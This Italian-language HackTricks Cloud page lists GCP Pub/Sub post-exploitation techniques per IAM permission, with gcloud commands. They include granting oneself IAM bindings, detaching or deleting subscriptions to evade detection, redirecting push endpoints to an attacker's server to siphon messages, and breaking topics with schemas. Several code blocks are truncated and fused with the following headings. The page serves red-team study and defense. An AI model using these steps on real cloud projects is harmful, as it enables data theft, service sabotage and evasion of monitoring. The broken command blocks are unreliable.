GCP - Pub/Sub Post Exploitation
Tip
Impara e pratica il hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP:HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.
Pub/Sub
Per maggiori informazioni su Pub/Sub consulta la seguente pagina:
pubsub.topics.publish
Pubblica un messaggio in un topic, utile per inviare dati inattesi e attivare funzionalità impreviste o exploit vulnerabilities:
Pubblica un messaggio nel topic
```bash # Publish a message in a topic gcloud pubsub topics publishpubsub.topics.detachSubscription
Utile per impedire a subscription di ricevere messaggi, magari per evitare il rilevamento.
Staccare subscription da topic
```bash gcloud pubsub topics detach-subscriptionpubsub.topics.delete
Utile per impedire a una subscription di ricevere messaggi, magari per evitare il rilevamento.
È possibile eliminare un topic anche se ci sono subscription collegate.
Elimina topic
```bash gcloud pubsub topics deletepubsub.topics.update
Usa questo permesso per aggiornare alcune impostazioni del topic per interromperne il funzionamento, come --clear-schema-settings, --message-retention-duration, --message-storage-policy-allowed-regions, --schema, --schema-project, --topic-encryption-key…
pubsub.topics.setIamPolicy
Concediti il permesso per eseguire uno qualsiasi degli attacchi precedenti.
# Add Binding
gcloud pubsub topics add-iam-policy-binding <TOPIC_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="<ROLE_OR_CUSTOM_ROLE>" \
--project="<PROJECT_ID>"
# Remove Binding
gcloud pubsub topics remove-iam-policy-binding <TOPIC_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="<ROLE_OR_CUSTOM_ROLE>" \
--project="<PROJECT_ID>"
# Change Policy
gcloud pubsub topics set-iam-policy <TOPIC_NAME> \
<(echo '{
"bindings": [
{
"role": "<ROLE_OR_CUSTOM_ROLE>",
"members": [
"serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com"
]
}
]
}') \
--project=<PROJECT_ID>
pubsub.subscriptions.create,pubsub.topics.attachSubscription , (pubsub.subscriptions.consume)
Recupera tutti i messaggi da un web server:
Crea una push subscription per ricevere i messaggi
```bash # Crete push subscription and recieve all the messages instantly in your web server gcloud pubsub subscriptions createCrea una sottoscrizione e usala per prelevare messaggi:
Crea una sottoscrizione pull e recupera i messaggi
```bash # This will retrive a non ACKed message (and won't ACK it) gcloud pubsub subscriptions createYou also need pubsub.subscriptions.consume for this
gcloud pubsub subscriptions pull
This command will wait for a message to be posted
</details>
### `pubsub.subscriptions.delete`
**Eliminare una subscription** potrebbe essere utile per interrompere un sistema di elaborazione dei log o qualcosa di simile:
<details>
<summary>Elimina subscription</summary>
```bash
gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>
pubsub.subscriptions.update
Usa questo permesso per aggiornare qualche impostazione in modo che i messaggi vengano salvati in un posto a cui puoi accedere (URL, Big Query table, Bucket) oppure semplicemente per interromperne il funzionamento.
Aggiorna endpoint della subscription
```bash gcloud pubsub subscriptions update --push-endpointpubsub.subscriptions.setIamPolicy
Concediti i permessi necessari per eseguire uno qualsiasi degli attacchi commentati in precedenza.
pubsub.schemas.attach, pubsub.topics.update,(pubsub.schemas.create)
Associa uno schema a un topic in modo che i messaggi non lo soddisfino e quindi il topic venga interrotto.
Se non ci sono schemi potresti doverne creare uno.
Crea un file schema e allegalo al topic
```json:schema.json { "namespace": "com.example", "type": "record", "name": "Person", "fields": [ { "name": "name", "type": "string" }, { "name": "age", "type": "int" } ] } ```# Attach new schema
gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
--schema=projects/<project-name>/schemas/<topic-id> \
--message-encoding=json
pubsub.schemas.delete
Questo potrebbe sembrare che eliminando uno schema sarai in grado di inviare messaggi che non soddisfano lo schema. Tuttavia, poiché lo schema verrà eliminato, nessun messaggio entrerà effettivamente nel topic. Quindi questo è INUTILE:
Elimina schema (inutile)
```bash gcloud pubsub schemas deletepubsub.schemas.setIamPolicy
Concediti le autorizzazioni necessarie per eseguire uno qualsiasi degli attacchi menzionati in precedenza.
pubsub.snapshots.create, pubsub.snapshots.seek
Questo creerà uno snapshot di tutti i messaggi unACKed e li reintrodurrà nella subscription. Non molto utile per un attacker ma ecco:
Crea uno snapshot e fai seek su di esso
```bash gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \ --subscription=YOUR_SUBSCRIPTION_NAME gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \ --snapshot=YOUR_SNAPSHOT_NAME ```Tip
Impara e pratica il hacking AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP:HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.
HackTricks Cloud

